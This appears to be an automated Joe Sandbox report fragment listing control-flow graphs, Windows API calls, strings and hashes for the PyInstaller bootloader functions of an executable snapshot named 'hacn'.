                                                                    • Instruction ID: 6b9010dbd652cd76cf797fe25dec1ab4853b7472ee626ae2a8675c0a2a359878
                                                                    • Opcode Fuzzy Hash: a2596121b459bc349cfae4ca6f1de26d09299e69c8ea2ab67b8f34c93d039d3f
                                                                    • Instruction Fuzzy Hash: 3E519D73A2960296EB14DF28D4505BD37A0EF48B88B54AA36DA0CC7799FE7CF440CB44

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 266 7ff67d001000-7ff67d0039d6 call 7ff67d010060 call 7ff67d010058 call 7ff67d0087b0 call 7ff67d010058 call 7ff67d00bd60 call 7ff67d0153f0 call 7ff67d015ff8 call 7ff67d001eb0 284 7ff67d003b7f 266->284 285 7ff67d0039dc-7ff67d0039ec call 7ff67d003ed0 266->285 287 7ff67d003b84-7ff67d003ba4 call 7ff67d00bdc0 284->287 285->284 291 7ff67d0039f2-7ff67d003a05 call 7ff67d003da0 285->291 291->284 294 7ff67d003a0b-7ff67d003a32 call 7ff67d007b70 291->294 297 7ff67d003a74-7ff67d003a9c call 7ff67d008050 call 7ff67d001cb0 294->297 298 7ff67d003a34-7ff67d003a43 call 7ff67d007b70 294->298 308 7ff67d003aa2-7ff67d003ab8 call 7ff67d001cb0 297->308 309 7ff67d003b4d-7ff67d003b5e 297->309 298->297 303 7ff67d003a45-7ff67d003a4b 298->303 306 7ff67d003a4d-7ff67d003a55 303->306 307 7ff67d003a57-7ff67d003a71 call 7ff67d01507c call 7ff67d008050 303->307 306->307 307->297 320 7ff67d003aba-7ff67d003ad2 call 7ff67d002b30 308->320 321 7ff67d003ad7-7ff67d003ada 308->321 312 7ff67d003bb2-7ff67d003bb5 309->312 313 7ff67d003b60-7ff67d003b67 309->313 316 7ff67d003bcb-7ff67d003be3 call 7ff67d008be0 312->316 317 7ff67d003bb7-7ff67d003bbd 312->317 313->312 318 7ff67d003b69-7ff67d003b71 call 7ff67d008980 313->318 334 7ff67d003be5-7ff67d003bec 316->334 335 7ff67d003bee-7ff67d003bf5 SetDllDirectoryW 316->335 322 7ff67d003bbf-7ff67d003bc9 317->322 323 7ff67d003bfb-7ff67d003c08 call 7ff67d006df0 317->323 336 7ff67d003ba5-7ff67d003ba8 call 7ff67d0014f0 318->336 337 7ff67d003b73 318->337 320->284 321->309 328 7ff67d003adc-7ff67d003af3 call 7ff67d003fe0 321->328 322->316 322->323 342 7ff67d003c53-7ff67d003c58 call 7ff67d006d70 323->342 343 7ff67d003c0a-7ff67d003c17 call 7ff67d006aa0 323->343 346 7ff67d003af5-7ff67d003af8 328->346 347 7ff67d003afa-7ff67d003b26 call 7ff67d0082c0 328->347 341 7ff67d003b7a call 7ff67d002b30 334->341 335->323 345 7ff67d003bad-7ff67d003bb0 336->345 337->341 341->284 353 7ff67d003c5d-7ff67d003c60 342->353 343->342 356 7ff67d003c19-7ff67d003c28 call 7ff67d006600 343->356 345->284 345->312 351 7ff67d003b35-7ff67d003b4b call 7ff67d002b30 346->351 347->309 363 7ff67d003b28-7ff67d003b30 call 7ff67d01028c 347->363 351->284 354 7ff67d003d06-7ff67d003d15 call 7ff67d0034c0 353->354 355 7ff67d003c66-7ff67d003c70 353->355 354->284 374 7ff67d003d1b-7ff67d003d74 call 7ff67d008950 call 7ff67d007fe0 call 7ff67d007b70 call 7ff67d003620 call 7ff67d008090 call 7ff67d006850 call 7ff67d006d70 354->374 359 7ff67d003c73-7ff67d003c7d 355->359 372 7ff67d003c2a-7ff67d003c36 call 7ff67d006580 356->372 373 7ff67d003c49-7ff67d003c4e call 7ff67d006850 356->373 365 7ff67d003c7f-7ff67d003c84 359->365 366 7ff67d003c86-7ff67d003c88 359->366 363->351 365->359 365->366 370 7ff67d003cd1-7ff67d003d01 call 7ff67d003620 call 7ff67d003460 call 7ff67d003610 call 7ff67d006850 call 7ff67d006d70 366->370 371 7ff67d003c8a-7ff67d003cad call 7ff67d001ef0 366->371 370->287 371->284 384 7ff67d003cb3-7ff67d003cbd 371->384 372->373 385 7ff67d003c38-7ff67d003c47 call 7ff67d006c40 372->385 373->342 409 7ff67d003d82-7ff67d003d85 call 7ff67d001e80 374->409 410 7ff67d003d76-7ff67d003d7d call 7ff67d007d50 374->410 388 7ff67d003cc0-7ff67d003ccf 384->388 385->353 388->370 388->388 413 7ff67d003d8a-7ff67d003d8c 409->413 410->409 413->287
                                                                    APIs
                                                                      • Part of subcall function 00007FF67D003ED0: GetModuleFileNameW.KERNEL32(?,00007FF67D0039EA), ref: 00007FF67D003F01
                                                                    • SetDllDirectoryW.KERNEL32 ref: 00007FF67D003BF5
                                                                      • Part of subcall function 00007FF67D007B70: GetEnvironmentVariableW.KERNEL32(00007FF67D003A1F), ref: 00007FF67D007BAA
                                                                      • Part of subcall function 00007FF67D007B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67D007BC7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                    • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                    • API String ID: 2344891160-1544818733
                                                                    • Opcode ID: 6bab0e2c748948cdb6b8347042124eea430fe40a6c516e8b4567730268968bf1
                                                                    • Instruction ID: 625f29efe44b28f2955519af0b693068441c744c5f4917031fd0cce2e177c8e3
                                                                    • Opcode Fuzzy Hash: 6bab0e2c748948cdb6b8347042124eea430fe40a6c516e8b4567730268968bf1
                                                                    • Instruction Fuzzy Hash: 71B19123A3CA8361EA66EF2195512FD5251BF847C8F402B36EA4DC769AFF2CF5048740

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                    • String ID: CreateProcessW$Error creating child process!
                                                                    • API String ID: 2895956056-3524285272
                                                                    • Opcode ID: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                    • Instruction ID: 3c8436d7ebe78b1b785c38bf73c225cfb257a28959a0d5a818fe8d94fd8ca8ae
                                                                    • Opcode Fuzzy Hash: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                    • Instruction Fuzzy Hash: B6411233A28B8291DA20DF64E4552AEB360FB943A4F501B35E6AD877D5EF7CE0448B40

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 507 7ff67d001050-7ff67d0010ab call 7ff67d00b5e0 510 7ff67d0010d3-7ff67d0010eb call 7ff67d015090 507->510 511 7ff67d0010ad-7ff67d0010d2 call 7ff67d002b30 507->511 516 7ff67d0010ed-7ff67d001104 call 7ff67d002890 510->516 517 7ff67d001109-7ff67d001119 call 7ff67d015090 510->517 524 7ff67d00126c-7ff67d0012a0 call 7ff67d00b2c0 call 7ff67d01507c * 2 516->524 522 7ff67d00111b-7ff67d001132 call 7ff67d002890 517->522 523 7ff67d001137-7ff67d001147 517->523 522->524 526 7ff67d001150-7ff67d001175 call 7ff67d0105dc 523->526 533 7ff67d00125e 526->533 534 7ff67d00117b-7ff67d001185 call 7ff67d010350 526->534 536 7ff67d001264 533->536 534->533 541 7ff67d00118b-7ff67d001197 534->541 536->524 542 7ff67d0011a0-7ff67d0011c8 call 7ff67d009a90 541->542 545 7ff67d001241-7ff67d00125c call 7ff67d002b30 542->545 546 7ff67d0011ca-7ff67d0011cd 542->546 545->536 547 7ff67d0011cf-7ff67d0011d9 546->547 548 7ff67d00123c 546->548 550 7ff67d001203-7ff67d001206 547->550 551 7ff67d0011db-7ff67d0011e8 call 7ff67d010d1c 547->551 548->545 554 7ff67d001219-7ff67d00121e 550->554 555 7ff67d001208-7ff67d001216 call 7ff67d00cb40 550->555 556 7ff67d0011ed-7ff67d0011f0 551->556 554->542 558 7ff67d001220-7ff67d001223 554->558 555->554 559 7ff67d0011f2-7ff67d0011fc call 7ff67d010350 556->559 560 7ff67d0011fe-7ff67d001201 556->560 562 7ff67d001225-7ff67d001228 558->562 563 7ff67d001237-7ff67d00123a 558->563 559->554 559->560 560->545 562->545 564 7ff67d00122a-7ff67d001232 562->564 563->536 564->526
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                    • API String ID: 2030045667-2813020118
                                                                    • Opcode ID: e318067b392980eface6509008cb7fe0607782201bbc93a051e4a56893f6ca8a
                                                                    • Instruction ID: 15508fc23feca2af24f58c1d45d7ea67adb27603b2d5d7dea89296977e0368b1
                                                                    • Opcode Fuzzy Hash: e318067b392980eface6509008cb7fe0607782201bbc93a051e4a56893f6ca8a
                                                                    • Instruction Fuzzy Hash: B551DD23A3968295EA20EF51A4403BA6690FB847D8F486A35EE4DC7789FE3CF554C700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF67D01F66A,?,?,-00000018,00007FF67D01B417,?,?,?,00007FF67D01B30E,?,?,?,00007FF67D016552), ref: 00007FF67D01F44C
                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF67D01F66A,?,?,-00000018,00007FF67D01B417,?,?,?,00007FF67D01B30E,?,?,?,00007FF67D016552), ref: 00007FF67D01F458
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                    • Instruction ID: 234013446e49255154d8bb0e44ed513ec0f659121e4ed6c2d25cb8b9317b11bd
                                                                    • Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                    • Instruction Fuzzy Hash: B941F523B3961246FA15CF16A8406BD2691BF49BA4F486B35DE0DD7784FE3DF4458300

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 664 7ff67d01c11c-7ff67d01c142 665 7ff67d01c15d-7ff67d01c161 664->665 666 7ff67d01c144-7ff67d01c158 call 7ff67d0155a4 call 7ff67d0155c4 664->666 667 7ff67d01c537-7ff67d01c543 call 7ff67d0155a4 call 7ff67d0155c4 665->667 668 7ff67d01c167-7ff67d01c16e 665->668 680 7ff67d01c54e 666->680 687 7ff67d01c549 call 7ff67d01afa4 667->687 668->667 670 7ff67d01c174-7ff67d01c1a2 668->670 670->667 673 7ff67d01c1a8-7ff67d01c1af 670->673 676 7ff67d01c1c8-7ff67d01c1cb 673->676 677 7ff67d01c1b1-7ff67d01c1c3 call 7ff67d0155a4 call 7ff67d0155c4 673->677 683 7ff67d01c1d1-7ff67d01c1d7 676->683 684 7ff67d01c533-7ff67d01c535 676->684 677->687 685 7ff67d01c551-7ff67d01c568 680->685 683->684 688 7ff67d01c1dd-7ff67d01c1e0 683->688 684->685 687->680 688->677 691 7ff67d01c1e2-7ff67d01c207 688->691 693 7ff67d01c209-7ff67d01c20b 691->693 694 7ff67d01c23a-7ff67d01c241 691->694 697 7ff67d01c20d-7ff67d01c214 693->697 698 7ff67d01c232-7ff67d01c238 693->698 695 7ff67d01c216-7ff67d01c22d call 7ff67d0155a4 call 7ff67d0155c4 call 7ff67d01afa4 694->695 696 7ff67d01c243-7ff67d01c26b call 7ff67d01dcbc call 7ff67d01b00c * 2 694->696 726 7ff67d01c3c0 695->726 729 7ff67d01c288-7ff67d01c2b3 call 7ff67d01c944 696->729 730 7ff67d01c26d-7ff67d01c283 call 7ff67d0155c4 call 7ff67d0155a4 696->730 697->695 697->698 700 7ff67d01c2b8-7ff67d01c2cf 698->700 703 7ff67d01c34a-7ff67d01c354 call 7ff67d02408c 700->703 704 7ff67d01c2d1-7ff67d01c2d9 700->704 715 7ff67d01c35a-7ff67d01c36f 703->715 716 7ff67d01c3de 703->716 704->703 708 7ff67d01c2db-7ff67d01c2dd 704->708 708->703 712 7ff67d01c2df-7ff67d01c2f5 708->712 712->703 717 7ff67d01c2f7-7ff67d01c303 712->717 715->716 721 7ff67d01c371-7ff67d01c383 GetConsoleMode 715->721 719 7ff67d01c3e3-7ff67d01c403 ReadFile 716->719 717->703 722 7ff67d01c305-7ff67d01c307 717->722 724 7ff67d01c409-7ff67d01c411 719->724 725 7ff67d01c4fd-7ff67d01c506 GetLastError 719->725 721->716 727 7ff67d01c385-7ff67d01c38d 721->727 722->703 728 7ff67d01c309-7ff67d01c321 722->728 724->725 732 7ff67d01c417 724->732 735 7ff67d01c508-7ff67d01c51e call 7ff67d0155c4 call 7ff67d0155a4 725->735 736 7ff67d01c523-7ff67d01c526 725->736 737 7ff67d01c3c3-7ff67d01c3cd call 7ff67d01b00c 726->737 727->719 734 7ff67d01c38f-7ff67d01c3b1 ReadConsoleW 727->734 728->703 738 7ff67d01c323-7ff67d01c32f 728->738 729->700 730->726 742 7ff67d01c41e-7ff67d01c433 732->742 744 7ff67d01c3b3 GetLastError 734->744 745 7ff67d01c3d2-7ff67d01c3dc 734->745 735->726 739 7ff67d01c3b9-7ff67d01c3bb call 7ff67d015538 736->739 740 7ff67d01c52c-7ff67d01c52e 736->740 737->685 738->703 748 7ff67d01c331-7ff67d01c333 738->748 739->726 740->737 742->737 751 7ff67d01c435-7ff67d01c440 742->751 744->739 745->742 748->703 749 7ff67d01c335-7ff67d01c345 748->749 749->703 756 7ff67d01c467-7ff67d01c46f 751->756 757 7ff67d01c442-7ff67d01c45b call 7ff67d01bd34 751->757 760 7ff67d01c4eb-7ff67d01c4f8 call 7ff67d01bb74 756->760 761 7ff67d01c471-7ff67d01c483 756->761 764 7ff67d01c460-7ff67d01c462 757->764 760->764 765 7ff67d01c4de-7ff67d01c4e6 761->765 766 7ff67d01c485 761->766 764->737 765->737 768 7ff67d01c48a-7ff67d01c491 766->768 769 7ff67d01c4cd-7ff67d01c4d8 768->769 770 7ff67d01c493-7ff67d01c497 768->770 769->765 771 7ff67d01c499-7ff67d01c4a0 770->771 772 7ff67d01c4b3 770->772 771->772 774 7ff67d01c4a2-7ff67d01c4a6 771->774 773 7ff67d01c4b9-7ff67d01c4c9 772->773 773->768 776 7ff67d01c4cb 773->776 774->772 775 7ff67d01c4a8-7ff67d01c4b1 774->775 775->773 776->765
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
                                                                    • Instruction ID: f3faf9103a087a065fdc0e2a6af1d8c512a046a9a92bffb2f16de09fa2f0533a
                                                                    • Opcode Fuzzy Hash: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
                                                                    • Instruction Fuzzy Hash: FDC1F32392C78282E7609F5590442BDBB64FF81B88F552B31DA4E87391EE7EF845C704

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                    • String ID:
                                                                    • API String ID: 995526605-0
                                                                    • Opcode ID: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
                                                                    • Instruction ID: 03b509b9e417798de557d71de7c50e6bd46a4f8f365bf5b2b7c883405290775a
                                                                    • Opcode Fuzzy Hash: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
                                                                    • Instruction Fuzzy Hash: 2621413262864292EA109F55E48412EB7A0FF857E4F501B35DAAC83AE8EF6CF4448700

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00007FF67D008660: GetCurrentProcess.KERNEL32 ref: 00007FF67D008680
                                                                      • Part of subcall function 00007FF67D008660: OpenProcessToken.ADVAPI32 ref: 00007FF67D008691
                                                                      • Part of subcall function 00007FF67D008660: GetTokenInformation.KERNELBASE ref: 00007FF67D0086B6
                                                                      • Part of subcall function 00007FF67D008660: GetLastError.KERNEL32 ref: 00007FF67D0086C0
                                                                      • Part of subcall function 00007FF67D008660: GetTokenInformation.KERNELBASE ref: 00007FF67D008700
                                                                      • Part of subcall function 00007FF67D008660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF67D00871C
                                                                      • Part of subcall function 00007FF67D008660: CloseHandle.KERNEL32 ref: 00007FF67D008734
                                                                    • LocalFree.KERNEL32(00000000,00007FF67D003B6E), ref: 00007FF67D008A0C
                                                                    • LocalFree.KERNEL32 ref: 00007FF67D008A15
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                    • API String ID: 6828938-1817031585
                                                                    • Opcode ID: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
                                                                    • Instruction ID: bd5a2366e6ab029fc1deeb5e772c3f27ee38ad768d02a67b8a4db86158fb0840
                                                                    • Opcode Fuzzy Hash: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
                                                                    • Instruction Fuzzy Hash: 3C216023A39A4691FA10EF20E4456F96355FF587D0F842B36E94DC3696FE3CF5448250

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 925 7ff67d01d620-7ff67d01d645 926 7ff67d01d64b-7ff67d01d64e 925->926 927 7ff67d01d913 925->927 929 7ff67d01d687-7ff67d01d6b3 926->929 930 7ff67d01d650-7ff67d01d682 call 7ff67d01aed8 926->930 928 7ff67d01d915-7ff67d01d925 927->928 932 7ff67d01d6be-7ff67d01d6c4 929->932 933 7ff67d01d6b5-7ff67d01d6bc 929->933 930->928 935 7ff67d01d6c6-7ff67d01d6cf call 7ff67d01c9e0 932->935 936 7ff67d01d6d4-7ff67d01d6e9 call 7ff67d02408c 932->936 933->930 933->932 935->936 940 7ff67d01d6ef-7ff67d01d6f8 936->940 941 7ff67d01d803-7ff67d01d80c 936->941 940->941 944 7ff67d01d6fe-7ff67d01d702 940->944 942 7ff67d01d80e-7ff67d01d814 941->942 943 7ff67d01d860-7ff67d01d885 WriteFile 941->943 945 7ff67d01d816-7ff67d01d819 942->945 946 7ff67d01d84c-7ff67d01d85e call 7ff67d01d0d8 942->946 949 7ff67d01d887-7ff67d01d88d GetLastError 943->949 950 7ff67d01d890 943->950 947 7ff67d01d713-7ff67d01d71e 944->947 948 7ff67d01d704-7ff67d01d70c call 7ff67d014a00 944->948 952 7ff67d01d838-7ff67d01d84a call 7ff67d01d2f8 945->952 953 7ff67d01d81b-7ff67d01d81e 945->953 973 7ff67d01d7f0-7ff67d01d7f7 946->973 955 7ff67d01d72f-7ff67d01d744 GetConsoleMode 947->955 956 7ff67d01d720-7ff67d01d729 947->956 948->947 949->950 951 7ff67d01d893 950->951 958 7ff67d01d898 951->958 952->973 959 7ff67d01d8a4-7ff67d01d8ae 953->959 960 7ff67d01d824-7ff67d01d836 call 7ff67d01d1dc 953->960 963 7ff67d01d74a-7ff67d01d750 955->963 964 7ff67d01d7fc 955->964 956->941 956->955 966 7ff67d01d89d 958->966 967 7ff67d01d90c-7ff67d01d911 959->967 968 7ff67d01d8b0-7ff67d01d8b5 959->968 960->973 971 7ff67d01d756-7ff67d01d759 963->971 972 7ff67d01d7d9-7ff67d01d7eb call 7ff67d01cc60 963->972 964->941 966->959 967->928 974 7ff67d01d8b7-7ff67d01d8ba 968->974 975 7ff67d01d8e3-7ff67d01d8ed 968->975 977 7ff67d01d75b-7ff67d01d75e 971->977 978 7ff67d01d764-7ff67d01d772 971->978 972->973 973->958 980 7ff67d01d8bc-7ff67d01d8cb 974->980 981 7ff67d01d8d3-7ff67d01d8de call 7ff67d015580 974->981 982 7ff67d01d8ef-7ff67d01d8f2 975->982 983 7ff67d01d8f4-7ff67d01d903 975->983 977->966 977->978 984 7ff67d01d7d0-7ff67d01d7d4 978->984 985 7ff67d01d774 978->985 980->981 981->975 982->927 982->983 983->967 984->951 986 7ff67d01d778-7ff67d01d78f call 7ff67d024158 985->986 991 7ff67d01d7c7-7ff67d01d7cd GetLastError 986->991 992 7ff67d01d791-7ff67d01d79d 986->992 991->984 993 7ff67d01d7bc-7ff67d01d7c3 992->993 994 7ff67d01d79f-7ff67d01d7b1 call 7ff67d024158 992->994 993->984 996 7ff67d01d7c5 993->996 994->991 998 7ff67d01d7b3-7ff67d01d7ba 994->998 996->986 998->993
                                                                    APIs
                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF67D01D60B), ref: 00007FF67D01D73C
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF67D01D60B), ref: 00007FF67D01D7C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                    • Instruction ID: 7b5a874170c82ec1d310c14cf85f9f6998925fdb0e6e429a07f38c116df5b9e8
                                                                    • Opcode Fuzzy Hash: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                    • Instruction Fuzzy Hash: 2091B223E2865285F7609F6594402BD2BA0FB54B8CF186B39DE0EA7684EF39F442C310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
